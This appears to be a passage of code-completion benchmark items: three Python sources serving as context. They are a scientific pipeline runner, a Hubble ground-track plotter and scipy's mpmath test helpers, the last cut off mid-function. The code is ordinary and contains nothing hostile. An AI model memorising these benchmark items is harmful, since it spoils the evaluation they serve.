gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
#!/usr/bin/env python
from __future__ import print_function
__version__ = '0.1.8'
import argparse
import errno
import os
import platform
import shutil
import stat
import subprocess
import sys
from collections import OrderedDict
from datetime import datetime
from pathlib import Path
# Populated in __main__
STAGES = {}
class StageError(Exception):
    """Raised for pipeline-stage errors (unknown stage name, output
    directory already present, no stages defined)."""
    pass
class Tee(object):
    """Context manager that duplicates stdout and stderr to a file.

    Constructing a Tee immediately installs it as both ``sys.stdout`` and
    ``sys.stderr``; exiting the context restores the original streams and
    closes the log file.
    """
    # http://stackoverflow.com/a/616686/1773758
    def __init__(self, path):
        # `path` is a pathlib.Path; the log is opened for text writing.
        self.file = path.open('w', encoding='utf8')
        self.stdout, sys.stdout = sys.stdout, self
        self.stderr, sys.stderr = sys.stderr, self

    def __enter__(self):
        pass

    def __exit__(self, type, value, traceback):
        # Restore the real streams before closing the log file.
        sys.stdout, sys.stderr = self.stdout, self.stderr
        self.file.close()

    def write(self, data):
        # Flush to ensure that data are written to disk
        self.file.write(data)
        self.file.flush()
        self.stdout.write(data)
        self.stdout.flush()

    def flush(self):
        # Bug fix: while the Tee is installed, any code calling
        # sys.stdout.flush() / sys.stderr.flush() previously raised
        # AttributeError because this file-like object had no flush().
        self.file.flush()
        self.stdout.flush()
class Stage(object):
    """A stage in a pipeline
    """
    def __init__(self, stage):
        # `stage` must be a key of the module-level STAGES mapping
        # (stage name -> command-line argument list).
        if stage not in STAGES:
            raise StageError('Stage [{0}] not recognised'.format(stage))
        else:
            self.stage = stage
            # Output directory is named after the command's final argument,
            # minus its extension, in that argument's parent directory.
            p = Path(STAGES[stage][-1])
            self.output_dir = p.parent / p.stem

    def _prime(self):
        "Creates self.output_dir. An error is raised if it already exists"
        if self.output_dir.is_dir():
            msg = ('Output directory [{0}] already exists. Has this stage '
                   'already been run?')
            raise StageError(msg.format(self.output_dir))
        else:
            self.output_dir.mkdir()
        # Duplicate stdout/stderr into a log file inside the new directory.
        return Tee(self.output_dir / 'log.txt')

    def _time_string(self):
        # Local-time ISO-8601-like stamp; %Z is empty for naive datetimes.
        return datetime.now().strftime('%Y-%m-%dT%H:%M:%S%Z')

    def _finished(self):
        "Makes output files read only"
        for p in (p for p in self.output_dir.rglob('*') if p.is_file()):
            mode = stat.S_IMODE(p.stat().st_mode)
            # Clear all write bits (user, group, other).
            p.chmod(mode & ~(stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))

    def _cmd(self, args):
        "Runs args and waits for it to finish, printing stdout"
        s = subprocess.Popen(args, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
        while True:
            line = s.stdout.readline()
            exitcode = s.poll()
            line = line[:-1]  # drop the trailing newline byte
            # Loop ends on an empty read once the child has exited.
            if not line and exitcode is not None:
                break
            elif line:
                print(line.decode(errors='replace'))
        if exitcode:
            # Propagate the child's failure code as our own exit status.
            sys.exit(exitcode)

    def run(self):
        "Runs this stage"
        with self._prime():
            print('Stage [{0}] started at [{1}]'.format(self.stage,
                  self._time_string()))
            print('Running somerset [{0}] in Python [{1}] on [{2}] [{3}]'.format(
                  __version__, sys.version, platform.node(), platform.platform()))
            args = STAGES[self.stage]
            # Log the tool's own version first; java spells the flag '-version'.
            if args[0].lower().endswith(('java', 'java.exe')):
                # Sigh...
                self._cmd( [args[0], '-version'] )
            else:
                self._cmd( [args[0], '--version'] )
            self._cmd(args)
            print('Stage [{0}] finished at [{1}]'.format(self.stage,
                  self._time_string()))
        # After the log is closed, mark every output file read-only.
        self._finished()
def run_all():
    """Run every configured stage, in definition order."""
    if not STAGES:
        raise StageError('No stages defined')
    print('Running all stages')
    # STAGES is an OrderedDict, so iteration preserves pipeline order.
    for name in STAGES:
        Stage(name).run()
    print('All stages completed')
def remove_all_output():
    """Delete the output directory of every configured stage."""
    if not STAGES:
        raise StageError('No stages defined')
    print('Removing all output directories')
    for name in STAGES:
        directory = Stage(name).output_dir
        if directory.is_dir():
            print('Removing [{0}]'.format(directory))
            # Output files were chmod'ed read-only, so use the
            # read-only-aware remover.
            rmtree_readonly(directory)
    print('All output directories removed')
def rmtree_readonly(path):
    """Like shutil.rmtree() but also deletes read-only files on Windows."""
    # http://stackoverflow.com/a/9735134
    def _retry_writable(func, failed_path, exc):
        error = exc[1]
        # Only retry permission failures from the delete calls themselves.
        if func not in (os.rmdir, os.remove) or error.errno != errno.EACCES:
            raise
        # The parent directory must be writeable for the delete to succeed.
        parent = os.path.abspath(os.path.join(failed_path, os.path.pardir))
        if not os.access(parent, os.W_OK):
            os.chmod(parent, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
        os.chmod(failed_path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)  # 0777
        func(failed_path)

    shutil.rmtree(str(path), ignore_errors=False, onerror=_retry_writable)
def main():
    """Command-line entry point for the pipeline runner.

    Loads STAGES from a ``stages.py`` in the current working directory,
    then either lists stages, removes output directories, or runs the
    requested stage(s).
    """
    sys.path.append(os.getcwd())  # For Windows
    try:
        import stages
    except ImportError as e:
        # Same behaviour as before: report and do nothing else.
        print('Unable to import stages.py: {0}'.format(e))
        return

    global STAGES
    # stages.STAGES rows are (name, arg0, arg1, ...); keep definition order.
    STAGES = OrderedDict((stage, args) for stage, *args in stages.STAGES)

    parser = argparse.ArgumentParser(description='Simple scientific pipelines')
    # Bug fix: the concatenated help literals previously read
    # "...names of stagesor a range" (missing space).
    parser.add_argument("stage", help='The stages to run. Can be names of '
                        'stages or a range e.g., 1-3', nargs='*')
    parser.add_argument('-v', '--version', action='version',
                        version='%(prog)s ' + __version__)
    parser.add_argument("-l", '--list-stages', action='store_true',
                        help='List all stages')
    group_r = parser.add_mutually_exclusive_group()
    group_r.add_argument('-r', '--remove-all-output', action='store_true',
                         help='Remove all stage output directories')
    group_r.add_argument('-R', '--REMOVE-ALL-OUTPUT', action='store_true',
                         help='Same as -r but does not prompt before removing')
    args = parser.parse_args()

    if args.list_stages:
        for key, command_line in STAGES.items():
            print(key, command_line)
        print('all')
    elif args.remove_all_output or args.REMOVE_ALL_OUTPUT:
        if args.remove_all_output:
            res = input('Are you sure you want to remove all output directories '
                        '(y/N)?')
        # -R skips the prompt entirely (res is only read when -r was given).
        if args.REMOVE_ALL_OUTPUT or 'y'==res.lower():
            remove_all_output()
        else:
            print('No action taken')
    elif 1 == len(args.stage) and 'all' == args.stage[0].lower():
        run_all()
    elif args.stage:
        # Renamed from `stages`, which shadowed the imported stages module.
        stages_to_run = None
        if (1 == len(args.stage) and '-' in args.stage[0] and
                args.stage[0] not in STAGES):
            # A range should be two stages separated by a hyphen
            lower, upper, *junk = args.stage[0].split('-')
            if lower in STAGES and upper in STAGES and not junk:
                keys = list(STAGES.keys())
                stages_to_run = keys[keys.index(lower):(1 + keys.index(upper))]
        if not stages_to_run:
            # A range was not given - expect one or more stages separated
            # by spaces
            stages_to_run = args.stage
        for stage in stages_to_run:
            Stage(stage).run()
    else:
        parser.print_help()
# Standard script entry point.
if __name__=='__main__':
    main()
| |
# This tool will plot the HST ground tracks
from mpl_toolkits.basemap import Basemap
from pylab import *
from matplotlib.font_manager import FontProperties
import sys, glob, os.path
import string, math
import ephem
import time_util
import spst_getopt
def get_tle_file(request_time, tle_files):
    """Return the HST TLE filename appropriate for `request_time`.

    Parameters
    ----------
    request_time :
        Time of interest, in any form accepted by time_util.spss_time.
    tle_files : dict
        Maps "YYYY.JJJ:HH:MM:SS" strings to [filename, spss_time] pairs
        giving the time from which each TLE file is valid.

    The search is restricted to either the pre-SM4 or post-SM4 portion
    of the (sorted) table, and the last file whose validity start is not
    after the time of interest wins.
    """
    # Bug fix: `keys = d.keys(); keys.sort()` fails on Python 3 dict
    # views; sorted() works on both Python 2 and 3.  The redundant local
    # `import time_util` (already imported at module level) is removed.
    tle_keys = sorted(tle_files)
    sm4_time = time_util.spss_time("2009.139:00:00:00")
    time_of_interest = time_util.spss_time(request_time)
    if (time_of_interest < sm4_time):
        min_index = 0
        max_index = tle_keys.index("2010.055:00:00:00")
    else:
        min_index = tle_keys.index("2010.055:00:00:00")
        max_index = len(tle_keys)
    # end if
    tle_file = tle_files[tle_keys[min_index]][0]
    for i in tle_keys[min_index:max_index]:
        if (time_of_interest >= tle_files[i][1]):
            tle_file = tle_files[i][0]
        # end if
    # end for i
    return tle_file
# end def get_tle_file
# Time at which the SAA contour definitions changed (used when plotting).
saa_switch_time = time_util.spss_time('2010.151:00:00:00')
# Deal with the input parameters
# 1st parm should be the start time for the HST ground track
# 2nd parm should be the end time for the HST ground track
# Both are required and in YYYY.JJJ:HH:MM:SS format
# Optional switch to label the HST ground track with HH:MM
labelhst = 0
allowed_options = ['labelhst']
options, parms = spst_getopt.spst_getopt(tuple(sys.argv[1:]), allowed_options)
# NOTE(review): dict.has_key() is Python 2 only; this whole script is Python 2.
if (options.has_key('-labelhst')):
    labelhst = 1
# end if
arg1 = time_util.spss_time(parms[0])
arg2 = time_util.spss_time(parms[1])
# Note: The +1s is necessary due to the ephem.Date losing 1s somewhere
targ1 = arg1 + 1
targ2 = arg2 + 1
hst_start = ephem.Date(targ1.strftime("%Y/%m/%d %H:%M:%S"))
hst_stop = ephem.Date(targ2.strftime("%Y/%m/%d %H:%M:%S"))
# One ground-track sample per minute of the requested interval.
num_points = int((hst_stop - hst_start)/ephem.minute)
# Get all the Two-Line ephemeris files
#name_list = glob.glob('/Users/niemi/Desktop/Misc/*.tle')
#tle_files = {}
#for tle in name_list:
#    temp_base = string.split(os.path.splitext(os.path.split(tle)[1])[0],"_")
#    print temp_base
#    if (len(temp_base) != 2):
#        continue
#    # end if
#    ephem_date_string = "20" + temp_base[1][0:2] + "." + temp_base[1][2:] + ":00:00:00"
#    tle_files[ephem_date_string] = [tle,time_util.spss_time(ephem_date_string)]
# end for tle
# Read in the HST Two-Line ephemeris
#SMN suggestions
# Fetch the current NORAD science TLE set and pick out the three HST lines
# (name line plus the two element lines that follow it).
import urllib2
hand = urllib2.urlopen('http://celestrak.com/NORAD/elements/science.txt')
data = hand.readlines()
hand.close()
HST = [[data[val], data[val+1], data[val+2]] for val, line in enumerate(data) if 'HST' in line]
hst = ephem.readtle(string.strip(HST[0][0]), string.strip(HST[0][1]), string.strip(HST[0][2]))
# Read in the HST Two-Line ephemeris
#hst_tle = get_tle_file(arg1, tle_files)
#temp = open(hst_tle,"r").readlines()
#hst = ephem.readtle(string.strip(temp[0]), \
#                    string.strip(temp[1]), \
#                    string.strip(temp[2]))
# Walk the requested interval one minute at a time, recording the satellite
# sub-point (longitude/latitude in degrees) and an HH:MM label per sample.
cur_time = hst_start
hst_longs = []
hst_lats = []
hst_text = []
for i in range(0,num_points):
    #print ephem.date(cur_time)
    hst.compute(cur_time)
    # sublong.znorm / sublat are radians; convert to degrees.
    hst_longs.append(hst.sublong.znorm*180.0/math.pi)
    hst_lats.append(hst.sublat*180.0/math.pi)
    ctime_text = "%02.2i:%02.2i" % (ephem.Date(cur_time).tuple()[3],ephem.Date(cur_time).tuple()[4])
    hst_text.append(ctime_text)
    cur_time = cur_time + ephem.minute
# end for i
#print "hst_longs = ", hst_longs
#print "hst_lats = ", hst_lats
#print "hst_text = ", hst_text
# Map framing parameters; only lon_0 is used by the projection selected below.
lon_0 = 330
lat_0 = -20
llcrnrlat = -60
llcrnrlon = -100
urcrnrlat = 20
urcrnrlon = 60
# use these values to setup Basemap instance.
width = 14000000
height = 10000000
#m = Basemap(width=width,height=height,\
#            resolution='c',projection='aeqd',\
#            lat_0=lat_0,lon_0=lon_0)
#m = Basemap(resolution='c',projection='aeqd',lat_0=lat_0,lon_0=lon_0)
#m = Basemap(width=width,height=height,\
#            resolution='c',projection='aea',\
#            lat_0=lat_0,lon_0=lon_0)
# McBryde-Thomas flat-polar quartic projection; alternatives kept for reference.
m = Basemap(resolution='c',projection='mbtfpq',lon_0=lon_0)
#m = Basemap(resolution='c',projection='moll',lon_0=lon_0)
#m = Basemap(resolution='c',projection='ortho',lon_0=lon_0,lat_0=lat_0)
#m = Basemap(resolution='c',projection='cyl',llcrnrlat=llcrnrlat,llcrnrlon=llcrnrlon,urcrnrlat=urcrnrlat,urcrnrlon=urcrnrlon)
p = FontProperties()
font1 = p.copy()
font1.set_size('small')
# draw coasts and fill continents.
m.drawcoastlines(linewidth=0.5)
#m.fillcontinents()
m.drawparallels(arange(-80,81,10),labels=[1,1,0,0],fontproperties=font1,labelstyle="+/-")
m.drawmeridians(arange(-180,180,20),labels=[0,0,0,1],fontproperties=font1,labelstyle="+/-")
m.drawmapboundary()
m.bluemarble()
m.drawmapboundary()
# South Atlantic Anomaly contour vertices, projected to map coordinates.
# Each pair of lists is (longitudes, latitudes) in degrees; longitudes above
# 180 are shifted by -360 into the map's range.  Two historical definition
# sets exist, switched at saa_switch_time (2010.151).
if (arg1 < saa_switch_time):
    # Use the previous definitions
    # SAA 02
    x2,y2 = m([357.4-360,357.6-360,356.9-360,355.0-360,352.3-360,348.7-360,342.9-360,336.4-360,324.8-360,303.2-360,292.1-360,289.0-360,285.9-360,283.5-360,282.5-360,282.4-360,282.7-360,357.4-360], \
              [-28.3,-26.1,-23.7,-21.2,-18.8,-16.3,-13.0,-10.6, -9.1,-11.9,-14.9,-17.0,-19.1,-21.3,-23.7,-26.0,-28.6,-28.3])
    # SAA 05,23
    x5,y5 = m([300.0-360, 45.0, 40.0, 30.0, 15.0,  0.0,341.0-360,318.0-360,300.0-360,283.0-360,273.0-360,275.0-360,300.0-360], \
              [-50.0,-30.0,-25.0,-21.0,-15.0,-10.2, -2.0,  1.0, -3.0, -8.0,-20.0,-30.0,-50.0])
    # SAA 24,25,28,31,32
    x24,y24=m([ 20.0, 21.0, 19.0,  7.5,347.0-360,336.4-360,324.8-360,303.2-360,292.1-360,285.9-360,283.5-360,282.5-360,282.4-360,282.7-360, 20.0], \
              [-28.3,-27.5,-26.1,-19.8, -9.6, -7.6, -6.0, -7.9,-12.0,-17.1,-20.3,-23.5,-26.0,-28.6,-28.3])
    # SAA 26,27,29,30
    x26,y26=m([ 25.0,  7.0,351.0-360,341.0-360,318.0-360,300.0-360,290.0-360,284.0-360,278.0-360,273.0-360,275.0-360, 25.0], \
              [-28.5,-16.0, -6.5, -2.0,  1.0, -3.0, -7.0,-10.0,-15.0,-20.0,-30.0,-28.5])
else:
    # Use the current definitions
    # SAA 02
    #x2,y2 = m([357.4-360,357.6-360,356.9-360,355.0-360,352.3-360,348.7-360,342.9-360,336.4-360,324.8-360,297.2-360,286.1-360,283.0-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360,357.4-360], \
    #          [-28.3, -26.1, -23.7, -21.2, -18.8, -16.3, -13.0, -10.6, -9.1, -11.9, -14.9, -17.0, -19.1, -21.3, -23.7, -26.0, -28.6, -28.3])
    x2,y2 = m([  2.0,  1.0,358.0-360,353.0-360,347.0-360,340.0-360,331.4-360,318.8-360,308.0-360,297.2-360,286.1-360,283.0-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360,  2.0], \
              [-29.0,-26.1,-23.0, -19.3, -15.6, -12.0, -9.9, -9.1, -10.0, -11.9, -14.9, -17.0, -19.1, -21.3, -23.7, -26.0, -28.6, -29.0])
    # SAA 05,23
    x5,y5 = m([294.0-360, 39.0, 34.0, 24.0,  9.0,354.0-360,335.0-360,312.0-360,294.0-360,277.0-360,267.0-360,269.0-360,294.0-360], \
              [-50.0,-30.0,-25.0,-21.0,-15.0,-10.2, -2.0,  1.0, -3.0, -8.0,-20.0,-30.0,-50.0])
    # SAA 24,25,28,31,32
    x24,y24=m([ 14.0, 15.0, 13.0,  1.5,341.0-360,330.4-360,318.8-360,297.2-360,286.1-360,279.9-360,277.5-360,276.5-360,276.4-360,276.7-360, 14.0], \
              [-28.3,-27.5,-26.1,-19.8, -9.6, -7.6, -6.0, -7.9,-12.0,-17.1,-20.3,-23.5,-26.0,-28.6,-28.3])
    # SAA 27,29,30
    x26,y26=m([ 19.0,  1.0,345.0-360,335.0-360,312.0-360,294.0-360,284.0-360,278.0-360,272.0-360,267.0-360,269.0-360, 19.0], \
              [-28.5,-16.0, -6.5, -2.0,  1.0, -3.0, -7.0,-10.0,-15.0,-20.0,-30.0,-28.5])
# end if
# HST observation ground track
xhst,yhst = m(hst_longs, hst_lats)
# Plot the four SAA contours and the ground track on the map.
saa02 = m.plot(x2,y2,marker='D',markersize=4.0,markeredgewidth=0.0,color='black',linestyle='-',label='02')
saa05 = m.plot(x5,y5,marker='s',markersize=4.0,markeredgewidth=0.0,color='blue',linestyle='-',label='05')
saa24 = m.plot(x24,y24,marker='x',markersize=4.0,markeredgewidth=1.0,color='green',linestyle='-',label='24')
saa26 = m.plot(x26,y26,marker='^',markersize=4.0,markeredgewidth=0.0,color='maroon',linestyle='-',label='26')
hst = m.plot(xhst,yhst,marker='+',markersize=4.0,markeredgewidth=0.5,color='red',linestyle='-',linewidth=0.3,label='hst')
hst_label = 'HST once per minute'
if (labelhst):
    # Optionally annotate each track point with its HH:MM stamp.
    hst_label = hst_label + ' (HH:MM)'
    for j in range(0, num_points):
        text(xhst[j],yhst[j],hst_text[j],fontsize=4,clip_on=True,horizontalalignment='left',verticalalignment='bottom')
font = p.copy()
font.set_size('xx-small')
legend((saa02,saa05,saa24,saa26,hst), \
       ('02 - FGS Guidance/STIS LV', \
        '05/23 - Astrometry/NICMOS', \
        '24/25/31/32 - STIS CCD/STIS MAMA/COS FUV/COS NUV', \
        '27/28/29/30 - ACS CCD/ACS SBC/WFC3 UVIS/WFC3 IR', \
        hst_label), \
       prop=font,numpoints=2,borderpad=0.3,loc='upper center',borderaxespad=0.0,ncol=2)
#figlegend((saa02,saa05,saa24,saa26),('02','05','24','26'),'upper right')
# draw the title.
title('HST from %s to %s' % (str(arg1),str(arg2)))
show()
| |
from __future__ import division, print_function, absolute_import
import sys
import time
import numpy as np
from numpy.testing import dec, assert_
from scipy._lib.six import reraise
from scipy.special._testutils import assert_func_equal
try:
import mpmath
except ImportError:
try:
import sympy.mpmath as mpmath
except ImportError:
pass
# ------------------------------------------------------------------------------
# Machinery for systematic tests with mpmath
# ------------------------------------------------------------------------------
class Arg(object):
    """
    Generate a set of numbers on the real axis, concentrating on
    'interesting' regions and covering all orders of magnitude.
    """

    def __init__(self, a=-np.inf, b=np.inf, inclusive_a=True, inclusive_b=True):
        # [a, b] is the sampling interval; inclusive_* control whether the
        # endpoints themselves may appear in the output.
        self.a = a
        self.b = b
        self.inclusive_a = inclusive_a
        self.inclusive_b = inclusive_b
        # Replace infinities with huge finite bounds so the log10/linspace
        # arithmetic in values() stays finite.
        if self.a == -np.inf:
            self.a = -np.finfo(float).max/2
        if self.b == np.inf:
            self.b = np.finfo(float).max/2

    def values(self, n):
        """Return an array containing approximatively `n` numbers."""
        # Budget: ~30% of points near [-1, 1], ~20% in [-10, 10],
        # the remainder spread logarithmically.
        n1 = max(2, int(0.3*n))
        n2 = max(2, int(0.2*n))
        n3 = max(8, n - n1 - n2)

        v1 = np.linspace(-1, 1, n1)
        v2 = np.r_[np.linspace(-10, 10, max(0, n2-4)),
                   -9, -5.5, 5.5, 9]
        # Log-spaced points, chosen per the sign pattern of the interval.
        if self.a >= 0 and self.b > 0:
            v3 = np.r_[
                np.logspace(-30, -1, 2 + n3//4),
                np.logspace(5, np.log10(self.b), 1 + n3//4),
                ]
            v4 = np.logspace(1, 5, 1 + n3//2)
        elif self.a < 0 < self.b:
            v3 = np.r_[
                np.logspace(-30, -1, 2 + n3//8),
                np.logspace(5, np.log10(self.b), 1 + n3//8),
                -np.logspace(-30, -1, 2 + n3//8),
                -np.logspace(5, np.log10(-self.a), 1 + n3//8)
                ]
            v4 = np.r_[
                np.logspace(1, 5, 1 + n3//4),
                -np.logspace(1, 5, 1 + n3//4)
                ]
        elif self.b < 0:
            v3 = np.r_[
                -np.logspace(-30, -1, 2 + n3//4),
                -np.logspace(5, np.log10(-self.b), 1 + n3//4),
                ]
            v4 = -np.logspace(1, 5, 1 + n3//2)
        else:
            v3 = []
            v4 = []
        # Always include 0, then clip to the requested interval.
        v = np.r_[v1, v2, v3, v4, 0]
        if self.inclusive_a:
            v = v[v >= self.a]
        else:
            v = v[v > self.a]
        if self.inclusive_b:
            v = v[v <= self.b]
        else:
            v = v[v < self.b]
        # np.unique also sorts the result.
        return np.unique(v)
class FixedArg(object):
    """Argument spec that always yields a fixed, caller-supplied value set."""

    def __init__(self, values):
        self._values = np.asarray(values)

    def values(self, n):
        # The requested count `n` is deliberately ignored.
        return self._values
class ComplexArg(object):
    """Complex-plane argument spec: the Cartesian grid of two real Arg specs."""

    def __init__(self, a=complex(-np.inf, -np.inf), b=complex(np.inf, np.inf)):
        self.real = Arg(a.real, b.real)
        self.imag = Arg(a.imag, b.imag)

    def values(self, n):
        # ~sqrt(n) points per axis gives roughly n grid points in total.
        per_axis = max(2, int(np.sqrt(n)))
        re_vals = self.real.values(per_axis)
        im_vals = self.imag.values(per_axis)
        return (re_vals[:,None] + 1j*im_vals[None,:]).ravel()
class IntArg(object):
    """Integer argument spec covering the half-open range [a, b)."""

    def __init__(self, a=-1000, b=1000):
        self.a = a
        self.b = b

    def values(self, n):
        # Reuse the real-axis generator, truncated to integers, and always
        # merge in the small integers -5..4.
        coarse = Arg(self.a, self.b).values(max(1 + n//2, n-5)).astype(int)
        small = np.arange(-5, 5)
        merged = np.unique(np.r_[coarse, small])
        # Note the half-open upper bound (v < b), unlike Arg's inclusive_b.
        return merged[(merged >= self.a) & (merged < self.b)]
class MpmathData(object):
    """Systematic comparison of a scipy function against an mpmath reference.

    `check()` generates argument grids from `arg_spec` (Arg/ComplexArg/
    IntArg instances, or a ready-made ndarray of argument rows) and asserts
    that `scipy_func` agrees with `mpmath_func` to within rtol/atol.
    """
    def __init__(self, scipy_func, mpmath_func, arg_spec, name=None,
                 dps=None, prec=None, n=5000, rtol=1e-7, atol=1e-300,
                 ignore_inf_sign=False, distinguish_nan_and_inf=True,
                 nan_ok=True, param_filter=None):
        self.scipy_func = scipy_func
        self.mpmath_func = mpmath_func
        self.arg_spec = arg_spec
        self.dps = dps
        self.prec = prec
        self.n = n
        self.rtol = rtol
        self.atol = atol
        self.ignore_inf_sign = ignore_inf_sign
        self.nan_ok = nan_ok
        if isinstance(self.arg_spec, np.ndarray):
            self.is_complex = np.issubdtype(self.arg_spec.dtype, np.complexfloating)
        else:
            self.is_complex = any([isinstance(arg, ComplexArg) for arg in self.arg_spec])
        # NOTE(review): ignore_inf_sign is assigned twice (see above); harmless.
        self.ignore_inf_sign = ignore_inf_sign
        self.distinguish_nan_and_inf = distinguish_nan_and_inf
        # Prefer an informative name; fall back from scipy to mpmath function.
        if not name or name == '<lambda>':
            name = getattr(scipy_func, '__name__', None)
        if not name or name == '<lambda>':
            name = getattr(mpmath_func, '__name__', None)
        self.name = name
        self.param_filter = param_filter

    def check(self):
        """Run the comparison; raises AssertionError on disagreement."""
        np.random.seed(1234)

        # Generate values for the arguments
        if isinstance(self.arg_spec, np.ndarray):
            argarr = self.arg_spec.copy()
        else:
            num_args = len(self.arg_spec)
            # Give complex arguments a 1.5x weight when splitting the budget.
            ms = np.asarray([1.5 if isinstance(arg, ComplexArg) else 1.0
                             for arg in self.arg_spec])
            ms = (self.n**(ms/sum(ms))).astype(int) + 1

            argvals = []
            for arg, m in zip(self.arg_spec, ms):
                argvals.append(arg.values(m))

            # Full Cartesian product of the per-argument sets, one row per call.
            argarr = np.array(np.broadcast_arrays(*np.ix_(*argvals))).reshape(num_args, -1).T

        # Check
        old_dps, old_prec = mpmath.mp.dps, mpmath.mp.prec
        try:
            if self.dps is not None:
                dps_list = [self.dps]
            else:
                dps_list = [20]
            if self.prec is not None:
                mpmath.mp.prec = self.prec

            # Proper casting of mpmath input and output types. Using
            # native mpmath types as inputs gives improved precision
            # in some cases.
            if np.issubdtype(argarr.dtype, np.complexfloating):
                pytype = mpc2complex

                def mptype(x):
                    return mpmath.mpc(complex(x))
            else:
                def mptype(x):
                    return mpmath.mpf(float(x))

                def pytype(x):
                    # A result with a non-negligible imaginary part is not
                    # representable in the real-valued comparison -> nan.
                    if abs(x.imag) > 1e-16*(1 + abs(x.real)):
                        return np.nan
                    else:
                        return mpf2float(x.real)

            # Try out different dps until one (or none) works
            for j, dps in enumerate(dps_list):
                mpmath.mp.dps = dps

                try:
                    assert_func_equal(self.scipy_func,
                                      lambda *a: pytype(self.mpmath_func(*map(mptype, a))),
                                      argarr,
                                      vectorized=False,
                                      rtol=self.rtol, atol=self.atol,
                                      ignore_inf_sign=self.ignore_inf_sign,
                                      distinguish_nan_and_inf=self.distinguish_nan_and_inf,
                                      nan_ok=self.nan_ok,
                                      param_filter=self.param_filter)
                    break
                except AssertionError:
                    # Re-raise only after the last precision has failed.
                    if j >= len(dps_list)-1:
                        reraise(*sys.exc_info())
        finally:
            # Always restore the global mpmath precision settings.
            mpmath.mp.dps, mpmath.mp.prec = old_dps, old_prec

    def __repr__(self):
        if self.is_complex:
            return "<MpmathData: %s (complex)>" % (self.name,)
        else:
            return "<MpmathData: %s>" % (self.name,)
def assert_mpmath_equal(*a, **kw):
    """Build an MpmathData comparison from the arguments and run it."""
    MpmathData(*a, **kw).check()
def nonfunctional_tooslow(func):
    # Unconditionally skip `func`: known to be too slow / not yet working.
    # NOTE(review): `dec` is numpy.testing.dec, removed in recent NumPy.
    return dec.skipif(True, " Test not yet functional (too slow), needs more work.")(func)
# ------------------------------------------------------------------------------
# Tools for dealing with mpmath quirks
# ------------------------------------------------------------------------------
def mpf2float(x):
    """Round an mpmath mpf to the nearest Python float.

    A plain float(x) can be off by one ulp, e.g. with mp.workdps(50):
    float(mpf("0.99999999999999999")) == 0.9999999999999999
    """
    # Render with 17 significant digits (enough to round-trip a double),
    # then let float() parse the decimal string.
    text = mpmath.nstr(x, 17, min_fixed=0, max_fixed=0)
    return float(text)
def mpc2complex(x):
    """Convert an mpmath mpc to a Python complex, rounding each part."""
    re_part = mpf2float(x.real)
    im_part = mpf2float(x.imag)
    return complex(re_part, im_part)
def trace_args(func):
    """Decorator that logs each call's arguments and result to stderr."""
    def _as_number(v):
        # Collapse mpmath scalars to plain complex/float for compact output.
        return complex(v) if isinstance(v, mpmath.mpc) else float(v)

    def wrap(*a, **kw):
        sys.stderr.write("%r: " % (tuple(map(_as_number, a)),))
        sys.stderr.flush()
        try:
            r = func(*a, **kw)
            sys.stderr.write("-> %r" % r)
        finally:
            # Terminate the line even if the call raised.
            sys.stderr.write("\n")
            sys.stderr.flush()
        return r
    return wrap
# Detect a POSIX platform with setitimer support (required for the
# SIGALRM-based implementation of time_limited below).
try:
    import posix
    import signal
    POSIX = ('setitimer' in dir(signal))
except ImportError:
    POSIX = False
class TimeoutError(Exception):
    """Raised internally when a time-limited call exceeds its timeout."""
    # NOTE(review): shadows the Python 3 builtin TimeoutError; the name is
    # kept unchanged for backward compatibility with existing callers.
    pass
def time_limited(timeout=0.5, return_val=np.nan, use_sigalrm=True):
    """
    Decorator for setting a timeout for pure-Python functions.

    If the function does not return within `timeout` seconds, the
    value `return_val` is returned instead.

    On POSIX this uses SIGALRM by default. On non-POSIX, settrace is
    used. Do not use this with threads: the SIGALRM implementation
    does probably not work well. The settrace implementation only
    traces the current thread.

    The settrace implementation slows down execution speed. Slowdown
    by a factor around 10 is probably typical.
    """
    if POSIX and use_sigalrm:
        def sigalrm_handler(signum, frame):
            raise TimeoutError()

        def deco(func):
            def wrap(*a, **kw):
                old_handler = signal.signal(signal.SIGALRM, sigalrm_handler)
                signal.setitimer(signal.ITIMER_REAL, timeout)
                try:
                    return func(*a, **kw)
                except TimeoutError:
                    return return_val
                finally:
                    # Cancel the timer and restore the previous handler,
                    # whether or not the alarm fired.
                    signal.setitimer(signal.ITIMER_REAL, 0)
                    signal.signal(signal.SIGALRM, old_handler)
            return wrap
    else:
        def deco(func):
            def wrap(*a, **kw):
                start_time = time.time()

                def trace(frame, event, arg):
                    # Returning None disables local (per-line) tracing, so the
                    # timeout is only checked at function-call events.
                    if time.time() - start_time > timeout:
                        raise TimeoutError()
                    return None  # turn off tracing except at function calls
                sys.settrace(trace)
                try:
                    return func(*a, **kw)
                except TimeoutError:
                    sys.settrace(None)
                    return return_val
                finally:
                    sys.settrace(None)
            return wrap
    return deco
def exception_to_nan(func):
    """Wrap *func* so that any raised exception yields nan instead."""
    def _safe_call(*args, **kwargs):
        try:
            result = func(*args, **kwargs)
        except Exception:
            return np.nan
        return result
    return _safe_call
def inf_to_nan(func):
    """Wrap *func* so that any non-finite return value becomes nan."""
    def _finite_call(*args, **kwargs):
        result = func(*args, **kwargs)
        # np.isfinite is False for inf, -inf and nan alike.
        return result if np.isfinite(result) else np.nan
    return _finite_call
def mp_assert_allclose(res, std, atol=0, rtol=1e-17):
    """
    Compare lists of mpmath.mpf's or mpmath.mpc's directly so that it
    can be done to higher precision than double.
    """
    try:
        len(res)
    except TypeError:
        # `res` is a generator/iterator: materialize it.
        res = list(res)

    n = len(std)
    if len(res) != n:
        raise AssertionError("Lengths of inputs not equal.")

    failures = []
    for k in range(n):
        try:
            assert_(mpmath.fabs(res[k] - std[k]) <= atol + rtol*mpmath.fabs(std[k]))
        except AssertionError:
            failures.append(k)

    # Report all mismatches at once, with a relative-difference column.
    ndigits = int(abs(np.log10(rtol)))
    msg = [""]
    msg.append("Bad results ({} out of {}) for the following points:"
               .format(len(failures), n))
    for k in failures:
        resrep = mpmath.nstr(res[k], ndigits, min_fixed=0, max_fixed=0)
        stdrep = mpmath.nstr(std[k], ndigits, min_fixed=0, max_fixed=0)
        if std[k] == 0:
            rdiff = "inf"
        else:
